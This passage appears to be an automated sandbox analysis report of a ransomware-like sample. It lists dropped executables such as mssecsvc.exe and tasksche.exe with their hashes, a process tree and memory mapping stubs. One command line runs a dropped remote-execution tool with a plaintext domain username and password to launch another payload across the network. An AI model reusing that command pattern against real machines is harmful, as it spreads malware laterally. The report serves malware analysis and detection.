C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
(process tree depth 1)
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\WINDOWS\mssecsvc.exe
MD5: 53e887584f552941244d293433ed9f30
SHA1: 2ade4566b4f94569c4730e53eda170afe4b2313a
SHA256: 0379e691ec21cc03c53cc73f1ad77414bf0ea84697aeee642d93399dbc378bf1
SHA512: c83a3cf8009ec42ca54b3c2be97833287fd8380452d5a6038d246da5266da7710f09396e50eb7872381bcd954860fab73704825fa6318fc75a8ceefbacf0d9d0
-
C:\Windows\TEMP\_osc.exe
MD5: 3c0d740347b0362331c882c2dee96dbf
SHA1: 8350e06f52e5c660bb416b03edb6a5ddc50c3a59
SHA256: ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85
SHA512: a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f
-
C:\Windows\TEMP\_yjl.exe
MD5: 27304b246c7d5b4e149124d5f93c5b01
SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA256: 3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512: bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\TEMP\opgpz.exe
MD5: 86d1a184850859a6a4d1c35982f3c40e
SHA1: 4abde6ff4d7f30c60dc61e866c4a11a7eee5bef5
SHA256: eb766983a8a05ad16b15e356df43f4e00f36092b8c6effdff3a580c2de2bba8f
SHA512: e9c18e0a70af00119bef1c697f0a801e9942c4702046d7f20533ea33c987c37c2007066b13935c8df6e039628db885cad2338feb95490e27cdcdbd57a7d0cc1a
-
C:\Windows\Temp\_osc.exeMD5
3c0d740347b0362331c882c2dee96dbf
SHA18350e06f52e5c660bb416b03edb6a5ddc50c3a59
SHA256ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85
SHA512a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\_yjl.exeMD5
27304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
C:\Windows\Temp\opgpz.exeMD5
86d1a184850859a6a4d1c35982f3c40e
SHA14abde6ff4d7f30c60dc61e866c4a11a7eee5bef5
SHA256eb766983a8a05ad16b15e356df43f4e00f36092b8c6effdff3a580c2de2bba8f
SHA512e9c18e0a70af00119bef1c697f0a801e9942c4702046d7f20533ea33c987c37c2007066b13935c8df6e039628db885cad2338feb95490e27cdcdbd57a7d0cc1a
-
C:\Windows\mssecsvc.exeMD5
53e887584f552941244d293433ed9f30
SHA12ade4566b4f94569c4730e53eda170afe4b2313a
SHA2560379e691ec21cc03c53cc73f1ad77414bf0ea84697aeee642d93399dbc378bf1
SHA512c83a3cf8009ec42ca54b3c2be97833287fd8380452d5a6038d246da5266da7710f09396e50eb7872381bcd954860fab73704825fa6318fc75a8ceefbacf0d9d0
-
C:\Windows\mssecsvc.exeMD5
53e887584f552941244d293433ed9f30
SHA12ade4566b4f94569c4730e53eda170afe4b2313a
SHA2560379e691ec21cc03c53cc73f1ad77414bf0ea84697aeee642d93399dbc378bf1
SHA512c83a3cf8009ec42ca54b3c2be97833287fd8380452d5a6038d246da5266da7710f09396e50eb7872381bcd954860fab73704825fa6318fc75a8ceefbacf0d9d0
-
C:\Windows\tasksche.exe
MD5: fae2eb3636050e9697b9b8dddb47e1ca
SHA1: 822ccc070c2cbc679a531680237f62c849d99831
SHA256: 0930215e92ee032d598661604af30e3d733eeea0499aaed0ebf8127f0c7acba5
SHA512: 4c1cab72324650fd122118984b9979bdd299764b868b806795c6d55fc6a7f885eb98a32a371910e5164a60c4478cd3e86bde77481cdbdd61b904bc8983c4e714
-
memory/204-25-0x0000000000000000-mapping.dmp
-
memory/248-33-0x0000000000000000-mapping.dmp
-
memory/260-24-0x0000000000000000-mapping.dmp
-
memory/264-35-0x0000000000000000-mapping.dmp
-
memory/272-37-0x0000000000000000-mapping.dmp
-
memory/504-8-0x0000000000000000-mapping.dmp
-
memory/912-19-0x0000000000000000-mapping.dmp
-
memory/1104-41-0x0000000000000000-mapping.dmp
-
memory/1468-2-0x0000000000000000-mapping.dmp
-
memory/1568-57-0x0000000000000000-mapping.dmp
-
memory/1684-53-0x0000000000000000-mapping.dmp
-
memory/1684-17-0x0000000000000000-mapping.dmp
-
memory/1728-55-0x0000000000000000-mapping.dmp
-
memory/1764-18-0x0000000000000000-mapping.dmp
-
memory/1772-29-0x0000000000000000-mapping.dmp
-
memory/2052-21-0x0000000000000000-mapping.dmp
-
memory/2308-15-0x0000000000000000-mapping.dmp
-
memory/2424-3-0x0000000000000000-mapping.dmp
-
memory/2436-27-0x0000000000000000-mapping.dmp
-
memory/2540-16-0x0000000000000000-mapping.dmp
-
memory/2652-31-0x0000000000000000-mapping.dmp
-
memory/2736-43-0x0000000000000000-mapping.dmp
-
memory/2736-22-0x0000000000000000-mapping.dmp
-
memory/2828-12-0x0000000000000000-mapping.dmp
-
memory/2984-51-0x0000000000000000-mapping.dmp
-
memory/3260-45-0x0000000000000000-mapping.dmp
-
memory/3512-49-0x0000000000000000-mapping.dmp
-
memory/3688-39-0x0000000000000000-mapping.dmp
-
memory/3744-47-0x0000000000000000-mapping.dmp
-
memory/3808-20-0x0000000000000000-mapping.dmp
-
memory/3820-9-0x0000000000000000-mapping.dmp
-
memory/3824-23-0x0000000000000000-mapping.dmp